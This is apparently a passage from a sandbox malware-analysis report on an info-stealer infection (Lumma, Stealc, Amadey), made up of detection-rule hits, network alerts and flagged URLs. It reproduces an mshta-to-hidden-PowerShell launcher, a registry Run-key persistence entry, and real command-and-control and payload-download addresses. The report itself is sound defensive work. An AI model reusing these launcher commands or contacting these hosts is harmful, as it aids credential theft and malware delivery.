Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", ProcessId: 8996, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", ProcessId: 8996, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentImage: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentProcessId: 9164, ParentProcessName: skotes.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1", ProcessId: 8712, ProcessName: powershell.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3724, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 2676, ProcessName: chrome.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 ", ProcessId: 8996, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 9164, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4136f86ac7.exe

Sigma detected: Wscript Shell Run In CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), CommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), ProcessId: 4160, ProcessName: mshta.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentImage: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentProcessId: 9164, ParentProcessName: skotes.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1", ProcessId: 8712, ProcessName: powershell.exe

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8712, TargetFilename: C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY1.ps1

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:06:21.681575+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.5	49732	TCP
2024-11-12T00:07:01.008650+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.5	50222	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:11.536551+0100	2028371	3	Unknown Traffic	192.168.2.5	50244	172.67.174.133	443	TCP
2024-11-12T00:07:12.691755+0100	2028371	3	Unknown Traffic	192.168.2.5	50247	172.67.174.133	443	TCP
2024-11-12T00:07:13.975556+0100	2028371	3	Unknown Traffic	192.168.2.5	50252	172.67.174.133	443	TCP
2024-11-12T00:07:15.612730+0100	2028371	3	Unknown Traffic	192.168.2.5	50256	172.67.174.133	443	TCP
2024-11-12T00:07:17.004930+0100	2028371	3	Unknown Traffic	192.168.2.5	50257	172.67.174.133	443	TCP
2024-11-12T00:07:18.698059+0100	2028371	3	Unknown Traffic	192.168.2.5	50260	172.67.174.133	443	TCP
2024-11-12T00:07:20.088767+0100	2028371	3	Unknown Traffic	192.168.2.5	50264	172.67.174.133	443	TCP
2024-11-12T00:07:22.764245+0100	2028371	3	Unknown Traffic	192.168.2.5	50270	23.210.122.61	443	TCP
2024-11-12T00:07:23.544745+0100	2028371	3	Unknown Traffic	192.168.2.5	50273	172.67.174.133	443	TCP
2024-11-12T00:07:23.963934+0100	2028371	3	Unknown Traffic	192.168.2.5	50278	188.114.96.3	443	TCP
2024-11-12T00:07:24.893780+0100	2028371	3	Unknown Traffic	192.168.2.5	50282	188.114.96.3	443	TCP
2024-11-12T00:07:26.279773+0100	2028371	3	Unknown Traffic	192.168.2.5	50285	188.114.96.3	443	TCP
2024-11-12T00:07:27.534071+0100	2028371	3	Unknown Traffic	192.168.2.5	50286	188.114.96.3	443	TCP
2024-11-12T00:07:29.060470+0100	2028371	3	Unknown Traffic	192.168.2.5	50290	188.114.96.3	443	TCP
2024-11-12T00:07:31.364196+0100	2028371	3	Unknown Traffic	192.168.2.5	50292	188.114.96.3	443	TCP
2024-11-12T00:07:33.686758+0100	2028371	3	Unknown Traffic	192.168.2.5	50294	188.114.96.3	443	TCP
2024-11-12T00:07:37.517306+0100	2028371	3	Unknown Traffic	192.168.2.5	50296	23.197.127.21	443	TCP
2024-11-12T00:07:37.642059+0100	2028371	3	Unknown Traffic	192.168.2.5	50297	188.114.96.3	443	TCP
2024-11-12T00:07:38.671833+0100	2028371	3	Unknown Traffic	192.168.2.5	50301	188.114.96.3	443	TCP
2024-11-12T00:07:41.129192+0100	2028371	3	Unknown Traffic	192.168.2.5	50303	188.114.96.3	443	TCP
2024-11-12T00:07:42.305648+0100	2028371	3	Unknown Traffic	192.168.2.5	50304	188.114.96.3	443	TCP
2024-11-12T00:07:44.188296+0100	2028371	3	Unknown Traffic	192.168.2.5	50306	188.114.96.3	443	TCP
2024-11-12T00:07:46.222681+0100	2028371	3	Unknown Traffic	192.168.2.5	50309	188.114.96.3	443	TCP
2024-11-12T00:07:48.123231+0100	2028371	3	Unknown Traffic	192.168.2.5	50311	188.114.96.3	443	TCP
2024-11-12T00:07:49.684033+0100	2028371	3	Unknown Traffic	192.168.2.5	50313	188.114.96.3	443	TCP
2024-11-12T00:07:52.464877+0100	2028371	3	Unknown Traffic	192.168.2.5	50316	188.114.96.3	443	TCP
2024-11-12T00:08:03.264404+0100	2028371	3	Unknown Traffic	192.168.2.5	50324	23.197.127.21	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:12.049130+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50244	172.67.174.133	443	TCP
2024-11-12T00:07:13.063395+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50247	172.67.174.133	443	TCP
2024-11-12T00:07:23.907036+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50273	172.67.174.133	443	TCP
2024-11-12T00:07:24.330042+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50278	188.114.96.3	443	TCP
2024-11-12T00:07:25.214943+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50282	188.114.96.3	443	TCP
2024-11-12T00:07:38.182349+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50297	188.114.96.3	443	TCP
2024-11-12T00:07:40.312956+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50301	188.114.96.3	443	TCP
2024-11-12T00:07:41.495718+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50303	188.114.96.3	443	TCP
2024-11-12T00:07:52.884363+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50316	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:12.049130+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50244	172.67.174.133	443	TCP
2024-11-12T00:07:24.330042+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50278	188.114.96.3	443	TCP
2024-11-12T00:07:40.312956+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50301	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:13.063395+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50247	172.67.174.133	443	TCP
2024-11-12T00:07:25.214943+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50282	188.114.96.3	443	TCP
2024-11-12T00:07:41.495718+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50303	188.114.96.3	443	TCP

ET MALWARE Single char EXE direct download likely trojan (multiple families)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:15.112528+0100	2018581	1	A Network Trojan was detected	192.168.2.5	50254	192.64.117.218	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:15.112528+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50254	192.64.117.218	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:11.134462+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50242	185.215.113.43	80	TCP
2024-11-12T00:07:14.000219+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50250	185.215.113.43	80	TCP
2024-11-12T00:07:23.418773+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50271	185.215.113.43	80	TCP
2024-11-12T00:07:27.767332+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50287	185.215.113.43	80	TCP
2024-11-12T00:07:31.194919+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50291	185.215.113.43	80	TCP
2024-11-12T00:07:36.193359+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50295	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:21.918949+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	61484	1.1.1.1	53	UDP
2024-11-12T00:07:36.568074+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	50952	1.1.1.1	53	UDP
2024-11-12T00:08:02.410127+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	56957	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:21.946767+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	55296	1.1.1.1	53	UDP
2024-11-12T00:07:36.595892+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	62605	1.1.1.1	53	UDP
2024-11-12T00:08:02.436345+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	60011	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:22.055144+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	54900	1.1.1.1	53	UDP
2024-11-12T00:07:36.732417+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	56622	1.1.1.1	53	UDP
2024-11-12T00:08:02.519800+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	49173	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:22.087575+0100	2057119	1	Domain Observed Used for C2 Detected	192.168.2.5	65482	1.1.1.1	53	UDP
2024-11-12T00:07:36.761515+0100	2057119	1	Domain Observed Used for C2 Detected	192.168.2.5	60270	1.1.1.1	53	UDP
2024-11-12T00:08:02.546889+0100	2057119	1	Domain Observed Used for C2 Detected	192.168.2.5	59274	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:22.018387+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	61200	1.1.1.1	53	UDP
2024-11-12T00:07:36.706084+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	52747	1.1.1.1	53	UDP
2024-11-12T00:08:02.492919+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	60239	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:21.884469+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	54876	1.1.1.1	53	UDP
2024-11-12T00:07:36.539465+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	54284	1.1.1.1	53	UDP
2024-11-12T00:08:02.381356+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	49494	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:22.114851+0100	2057101	1	Domain Observed Used for C2 Detected	192.168.2.5	50625	1.1.1.1	53	UDP
2024-11-12T00:07:36.816741+0100	2057101	1	Domain Observed Used for C2 Detected	192.168.2.5	49989	1.1.1.1	53	UDP
2024-11-12T00:08:02.573474+0100	2057101	1	Domain Observed Used for C2 Detected	192.168.2.5	64465	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:21.986434+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	58600	1.1.1.1	53	UDP
2024-11-12T00:07:36.679868+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	54551	1.1.1.1	53	UDP
2024-11-12T00:08:02.466019+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	55407	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:06:04.456977+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:06:04.450848+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:06:04.654225+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:06:05.584231+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:06:04.661283+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49704	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:14.493834+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50252	172.67.174.133	443	TCP
2024-11-12T00:07:31.777124+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50292	188.114.96.3	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:06:04.246324+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-12T00:07:29.461255+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50289	185.215.113.206	80	TCP
2024-11-12T00:07:45.449972+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50307	185.215.113.206	80	TCP
2024-11-12T00:07:56.119310+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50319	185.215.113.206	80	TCP
2024-11-12T00:08:02.327561+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50323	185.215.113.206	80	TCP
2024-11-12T00:08:10.552293+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50327	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:18.906842+0100	2856121	1	A Network Trojan was detected	192.168.2.5	50259	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:04.298247+0100	2856147	1	A Network Trojan was detected	192.168.2.5	50229	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:10.340648+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50234	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:07.864239+0100	2803305	3	Unknown Traffic	192.168.2.5	50236	31.41.244.11	80	TCP
2024-11-12T00:07:11.780315+0100	2803305	3	Unknown Traffic	192.168.2.5	50245	31.41.244.11	80	TCP
2024-11-12T00:07:15.112528+0100	2803305	3	Unknown Traffic	192.168.2.5	50254	192.64.117.218	443	TCP
2024-11-12T00:07:19.589306+0100	2803305	3	Unknown Traffic	192.168.2.5	50263	185.215.113.16	80	TCP
2024-11-12T00:07:19.675333+0100	2803305	3	Unknown Traffic	192.168.2.5	50262	176.9.192.202	443	TCP
2024-11-12T00:07:21.006719+0100	2803305	3	Unknown Traffic	192.168.2.5	50265	176.9.192.202	443	TCP
2024-11-12T00:07:22.446484+0100	2803305	3	Unknown Traffic	192.168.2.5	50269	176.9.192.202	443	TCP
2024-11-12T00:07:23.806432+0100	2803305	3	Unknown Traffic	192.168.2.5	50272	176.9.192.202	443	TCP
2024-11-12T00:07:24.072337+0100	2803305	3	Unknown Traffic	192.168.2.5	50276	185.215.113.16	80	TCP
2024-11-12T00:07:31.945988+0100	2803305	3	Unknown Traffic	192.168.2.5	50293	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:06:06.046710+0100	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-12T00:06:25.781732+0100	2803304	3	Unknown Traffic	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:26.762412+0100	2803304	3	Unknown Traffic	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:27.224531+0100	2803304	3	Unknown Traffic	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:27.554559+0100	2803304	3	Unknown Traffic	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:28.360328+0100	2803304	3	Unknown Traffic	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:28.641359+0100	2803304	3	Unknown Traffic	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:32.815945+0100	2803304	3	Unknown Traffic	192.168.2.5	49957	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:20.092582+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50264	172.67.174.133	443	TCP
2024-11-12T00:07:33.718631+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50294	188.114.96.3	443	TCP
2024-11-12T00:07:49.688845+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50313	188.114.96.3	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T00:07:23.498338+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	50270	23.210.122.61	443	TCP
2024-11-12T00:07:38.106267+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	50296	23.197.127.21	443	TCP
2024-11-12T00:08:03.924912+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	50324	23.197.127.21	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://31.41.244.11/files/k4pDgO.ps1	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllLp	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php?V	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exeX	Avira URL Cloud: Label: phishing
Source: https://fadehairucw.store/N	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/file1.exeJ	Avira URL Cloud: Label: phishing
Source: https://crisiwarny.store/8	Avira URL Cloud: Label: malware
Source: https://presticitpo.store/h	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpX	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpS	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpd	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/o	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exey	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpa	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exep	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php1t#	Avira URL Cloud: Label: malware
Source: https://crisiwarny.store:443/apiv	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpr	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php%WpO	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpv	Avira URL Cloud: Label: malware

